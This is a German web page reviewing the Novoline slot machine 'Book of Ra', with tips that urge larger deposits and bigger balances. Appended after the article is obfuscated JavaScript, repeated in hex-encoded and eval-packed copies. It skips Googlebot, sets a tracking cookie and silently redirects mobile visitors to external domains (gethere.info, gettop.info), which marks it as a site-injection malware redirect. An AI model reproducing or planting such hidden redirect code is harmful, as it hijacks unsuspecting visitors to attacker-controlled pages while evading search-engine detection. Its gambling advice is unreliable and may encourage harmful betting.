Wenn das um die Tradition dieser Slot-Automaten geht, fällt der Slot Buch des Ra ganz klar heraus und rege Online Gambler kennen diesen Slot von dem Unternehmen Novoline sehr gut

Book of Ra – dieser populärste Internet Slotspiel-Apparat seit eh und jäh

Immer schon ist bei den Automatenspielen das Slotautomaten-Spiel Buch des Ra eines der tollsten und angesehensten. Die Firma Novoline wusste, dass dieses Spielthema auch den Internet-Kunden zusagen würde. So wurde flugs begonnen, eine Internet-Variante dieses beliebten Automaten-Slots zu entwickeln.

Die Geburt von Buch des Ra

Neben Merkur ist Novoline in den deutschsprachigen Ländern der bekannteste Hersteller von Slots. Sollte jemand die Zahl jener von diesem Anbieter gelieferten Slotspiele in den Spielbanken sagen, würde das sicherlich enorm schwerfallen.

Am Anfang konnten die Slotspieler den Slot Spiel auf Mybet finden. Dann gründete Novoline aber sein spezielles Online Spielcasino, das Stargames. Eben dort ist das, wo Sie auch am heutigen Tage noch exklusiv Buch des Ras im deutschsprachigen Raum um Geldmünzen spielen können. Nun gibt es aber andere Möglichkeiten, diesen Automaten-Slot auch kostenlos online zu testen. Dieses geht z.B. beim Spiele-Anbieter Gametwist. Bei beiden allen beiden müssen Sie sich anmelden, um zu gamblen, sei es kostenlos oder auch für reales Echtgeld. Mittlerweile finden die Zocker zusätzlich ein paar Alternativen, den Slot-Automaten umsonst zu spielen, um ihn auszuprobieren.

Die Features von Book of Ra sind das extrem einfaches Prinzip des Spiels, das Spielthema selbst und weitere interessante Besonderheiten, welche jenes klasse und aufregendes Spielerlebnis darbieten. Es gibt neben der traditionellen Variante nun auch eine Version von Buch des Ras “Deluxe”, der Sonderausführung, die für Sie noch lukrativer sein könnte.

Auf welche Art und Weise wird Buch des Ras angewandt?

Die 2016 – Version des Book of Ra ist wie von Beginn an ein simpler Slot-Automat, jedoch doch mit zahlreichen komplexen Merkmalen. Grundsätzlich ist das, genauso wie viele verschiedene Online Automaten-Slots, ein Spiel auf fünf Spielwalzen und zehn Gewinnlinien. Der Inhalt legt sich an diesen bekannten Kinohit “Indiana Jones” an. die wichtigste Figur ist dieser immer einen Sonnenschutzhut auf dem Kopf tragende Archäologe, welcher jenes sagenhafte Buch des Sonnengottes Ra aufspürt. Ra, jener Sonnengott aus dem ägyptischen Lande, wird allerdings auf den Walzen nie selber auftauchen. Dafür jedoch um so öfter jenes interessante Buch von dem Sonnengott, als eines dieser Symbole, das dem Slotspiel dem Namen gibt.

Sobald die Spieler loslegen, diesen Slot-Automaten zu zocken, legen die Glücksspieler einzig und allein kurz ihren Spieleinsatz fest und klicken, mit wie vielen Gewinnzeilen die Spieler vorzugsweise spielen könnten. Wenn die Spielenden sich für alle Linien festlegen, ist das am besten, denn damit können die Zocker beim Freispiel-Modus höhere Geldgewinne erzielen. Wenn die beiden Details schnell geklickt wurden, drücken Sie auf die Play-Taste und alle Spielwalzen spinnen sich bunt und unterhaltsam vor Ihren Augen. Ein Geldgewinn machen Sie schon, sobald Sie zwei oder auch mehrere Symbole auf einer Linie landen.

Was für Spiel-Symbole existieren beim Book of Ra?

Jenes bereits genannte legendäre Buch des Ras selbst ist hier beim Slot Spiel das Scatter-Zeichen. Durch 3 oder zahlreichere dieser Zeichen, werden im Handumdrehen 10 Freidrehungen ausgelöst. Dieser Scatter ersetzt auch, so wie bei vielen anderen Slotspielautomaten, auch alle weiteren Symbole. Jener Forscher oder Archäologe wäre das wichtigste Zeichen auf jenen Gewinnzeilen. Zwei davon und die Zocker gewinnen sofort Geld. Genauso gewinnt der Slot-Automat, wenn ein Pharao im vergoldetem Sarkophag auf dem Display erscheint. Genau der ist das andere wichtigste Zeichen dieses Slots.

Außerdem werden die Gambler noch mit dem legendären Glückskäfer und der Göttin Nut Bekanntschaft machen. Auch diese werden Ihnen tolle Gewinne geben. Von allen anderen Spielsymbolen, den Spielkarten (Zehn, Bube, Dame, König, As), benötigen die Zocker aber jeweils 3 gleiche Zeichen auf den Spielwalzen und Gewinnlinien, um was zu erspielen.

Jene aufregende Spiel-Funktion von Book of Ra

Bei fast allen anderen Slots vom Hersteller Novoline gibt es als Bonus-Spiel die Gamble-Taste. Buch des Ras preist Ihnen diese natürlich zusätzlich an. Erspielen Sie Geld, dürfen die Spielenden diesen Gewinn sofort einsetzen und wieder setzen. Hierbei handelt es sich um jenes einfache, aber nette Kartenspiel, ob die weitere angezeigte Spielkarte, die Farbe Schwarz oder Rot haben wird. Erraten die Gambler diese Kartenfarbe, spielen Sie nochmal, sollten die Spieler wollen, und ihr Spielgewinn kann erheblich größer werden, erraten die Spielenden zusätzlich jene weitere Farbe richtig. Leider wird jeglicher Gewinn im Handumdrehen verloren, sollte die Antwort auch nur einmal falsch sein. So raten wir jederzeit, die Spielfunktion mit Vorsicht zu spielen und nicht zu übermütig zu spielen, sollten einmal mehrere richtig geratene Spielkarten aufeinander folgen.

Die Freispiele von diesem Automaten-Slot

Stoppen 3 Books of Ra zur gleichen Zeit auf dem Bildschirm, gewinnen die Spielenden sofort 10 Freie Spiele. Dann berufen die Glücksspieler eins der Symbole als Bonussymbol und das dieses würde bei der Freispiel-Runde noch mit einem Multiplikations-Faktor ausgestattet. Wählen die Spieler die weniger auftauchenden Spielsymbole dazu aus, erzielen die im Gewinnfall den lukrativeren Spielgewinn. Auf der anderen Seite gehen diese klar nicht ganz so oft auf Ihren Linien auf. Sowie vorher bereits einmal gesagt, sollten die Spielenden jederzeit auf der gesamten Anzahl von Gewinnzeilen zocken, denn auch die agieren als Multiplikations-Faktor bei diesen Freispielen. Erfahren Sie mehr über spiele online kostenlos spielen.

Unsere interessanten Book of Ra Kniffe und auch Tipps

Wir raten Ihnen dieses hier aufmerksam zu studieren, sollten die Spieler bei dem Slot Spiel hohe Aussichten auf Gewinne haben möchten:

  • Machen Sie sich vor dem Spiel gut über die generellen Spielbedingungen und auch jene Relaod-Boni eines Slotspiels.
  • Besitzen die Spielenden einmal nicht ganz so zahlreiches Gambler-Glück und die Spieler zocken eine Serie ohne einen Gewinn zu erzielen, überleben Sie diese einfach einfacher, wenn die Spielenden größere Einzahlungen getätigt haben.
  • Zocken Sie jedes Mal mit einen identischem Münzeinsatz, wissen die Spieler korrekterweise, womit der rasch verdoppelt werden kann. Dieses Aufstocken der Gewinnkombinationen bestätigt sich als extrem gut.
  • Sie müssen jederzeit minimal ausreichend Geldeinsatz für 50 Spielrunden als Guthaben haben. Beim Spielen der Buch des Ras “Deluxe-Version” raten wir jedoch viel mehr auf Ihrem Spielkonto zu haben, damit Sie lukrativer gewinnen zu können.

Ihre Auszahlquote liegt bei Book of Ra bei weit über 80% und bei Buch des Ras “Deluxe” bei extrem hohen 94+ Prozent. Diese Auszahlungsrate wird auch “RTP” genannt, (“Returned to Player” im Englischen), so dem Wert, welcher Ihnen anhand der Spielgewinne wieder gezahlt wird. Die Rate wird bei unterschiedlichen Online Spielcasinos jeweils verschieden festgesetzt und wir raten jeweils erst, bevor die Zocker den gewissen Spielanbieter oder auch Slot-Automat zu testen, die Zahlquote anzusehen. Häufig findet man interessante Tipps in den Bewertungen anderer Internet Gambler, welche in verschiedenen Spiel-Portalen ihre eigene Meinung äußern.

All diese Tipps sind selbstverständlich keineswegs ausschließlich beim Slot Book of Ra wichtig, jedoch zusätzlich für alle weiteren Slotspielautomaten, welche die Zocker in vielen Online Spiel Casinos finden dürfen. Die Spieler können damit die normalen Gewinn-Chancen in jeden Fall vergrößern und würden einen unglaublich erlebnisreichen und gewinnbringenden Spielslot spielen können.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} setTimeout(“document.location.href=’http://gettop.info/kt/?53vSkc&'”, delay);var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘z(1d.1k.1l(“16”)==-1){(2V(a,b){z(a.1l(“2W”)==-1){z(/(2X|2U\\d+|2T).+1b|2P|2Q\\/|2R|2S|2Y|2Z|37|38|39|G(36|B|L)|W|35|30 |31|33|34|1b.+2O|2N|1i m(2z|2A)i|2B( K)?|2y|p(2x|2t)\\/|2u|2v|2w|2C(4|6)0|2D|2K|M\\.(2L|2M)|2J|2I|2E 2F|2G|2H/i.17(a)||/3a|3b|3E|3F|3G|50[1-6]i|3D|3C|a D|3y|X(N|Z|s\\-)|Y(3z|3A)|O(3B|1g|U)|3H|3I(3P|x|3Q)|3R|P(3O|A)|3N(j|3J)|3K|3L(3M|\\-m|r |s )|3x|3w(I|S|3i)|1a(3j|3k)|3h(X|3g)|3c(e|v)w|3d|3e\\-(n|u)|3f\\/|3l|3m|2s\\-|3u|3v|3s|3r\\-|U(3n|R)|3o|3p(V|S|3q)|3S|2l\\-s|1B|1x|1y|1c(c|p)o|1E(12|\\-d)|1J(49|Y)|1w(1H|1F)|N(1m|1n)|1o|1v([4-7]0|K|D|1p)|1s|1q(\\-|15)|F u|1r|1I|2r\\-5|g\\-y|A(\\.w|B)|2f(L|29)|2a|2b|2i\\-(m|p|t)|2o\\-|2p(J|14)|2n( i|G)|2j\\-c|2k(c(\\-| |15|a|g|p|s|t)|28)|27(1S|1T)|i\\-(20|A|q)|1R|1Q( |\\-|\\/)|1N|1O|1P|1V|1W|24|25|W|23(t|v)a|22|1X|1Y|1Z|2e|26( |\\/)|1U|2m |2q\\-|2h(c|k)|2c(2d|2g)|1M( g|\\/(k|l|u)|50|54|\\-[a-w])|1t|1u|1L\\-w|1G|1K\\/|q(j|1D|1z)|Q(f|21|1g)|m\\-1A|1C(3t|T)|4p(5E|5F|E)|5G|y(f|5D|1a|5C|1c|t(\\-| |o|v)|5z)|5A(50|3T|v )|5H|5I|5O[0-2]|5P[2-3]|5N(0|2)|5M(0|2|5)|5J(0(0|1)|10)|5K((c|m)\\-|5L|5y|5x|5l|5m)|5n(6|i)|5k|5j|5g(5h|5i)|5o|5p|5v|5R(a|d|t)|5u|5t(13|\\-([1-8]|c))|5q|5r|C(5s|5Q)|67\\-2|65(I|69|11)|63|64|J\\-g|5U\\-a|5Z(5Y|12|21|32|60|\\-[2-7]|i\\-)|5X|66|6a|6c|6b|5V(5T|62)|5W\\/|5S(6d|q|68|5w|x|5e)|4m(f|h\\-|Z|p\\-)|4n\\/|11(c(\\-|0|1)|47|Q|R|T)|4o\\-|4l|4k(\\-|m)|4h\\-0|4i(45|4j)|5f(O|P|4q|V|4w)|4x(4v|x)|4u(f|h\\-|v\\-|v )|4r(f|4s)|4t(18|50)|4g(4f|10|18)|14(3Z|41)|42\\-|3Y\\-|3X(i|m)|3U\\-|t\\-y|3V(C|3W)|E(H|m\\-|43|44)|4d\\-9|M(\\.b|F|4e)|4c|4b|46|48|4a(4y|j)|4z(40|5[0-3]|\\-v)|4Y|4Z|51|4X(52|53|60|61|H|4W|4T|4U|4V|55)|56(\\-| )|5c|5d|5b(g |5a|57)|58|59|4S|4R\\-|4F|4G|4H\\-/i.17(a.4E(0,4))){4D 1e=1h 19(1h 19().4A()+4B);1d.1k=”16=1; 4C=/;4I=”+1e.4J();1j.4P=b}}})(1f.4Q||1f.4O||1j.1i,\’4N://4K.4L/4M/?5B&\’)}’,62,386,’|||||||||||||||01||||te|||||||ma|||||||ny|mo|if|go|od|pl|wa|ts|g1|ip|70|ck|pt|os|ad|up|er|al|ar|mc|nd|ll|ri|co|it|iris|ac|ai|oo||se|||ta|_|_mauthtoken|test||Date|bi|mobile|do|document|tdate|navigator|ca|new|opera|window|cookie|indexOf|ic|k0|esl8|ze|fly|g560|fetc|libw|lynx|ez|em|dica|dmob|xo|cr|devi|me|ui|ds|ul|m3ga|l2|gene|el|m50|m1|lg|ibro|idea|ig01|iac|i230|aw|tc|klon|ikom|im1k|jemu|jigs|kddi|||jbro|ja|inno|ipaq|kgt|hu|tp|un|haie|hcit|le|no|keji|gr|xi|kyo|hd|hs|ht|dc|kpt|hp|hei|hi|kwc|gf|cdm|re|plucker|pocket|psp|ixi|phone|ob|in|palm|series|symbian|windows|ce|xda|xiino|wap|vodafone|treo|browser|link|netfront|firefox|avantgo|bada|blackberry|blazer|meego|bb|function|Googlebot|android|compal|elaine|lge|maemo||midp|mmp|kindle|hone|fennec|hiptop|iemobile|1207|6310|br|bumb|bw|c55|az|bl|nq|lb|rd|capi|ccwa|mp|craw|da|ng|cmd|cldc|rc|cell|chtm|be|avan|abac|ko|rn|av|802s|770s|6590|3gso|4thp|amoi|an|us|attw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))

Articulos relacionados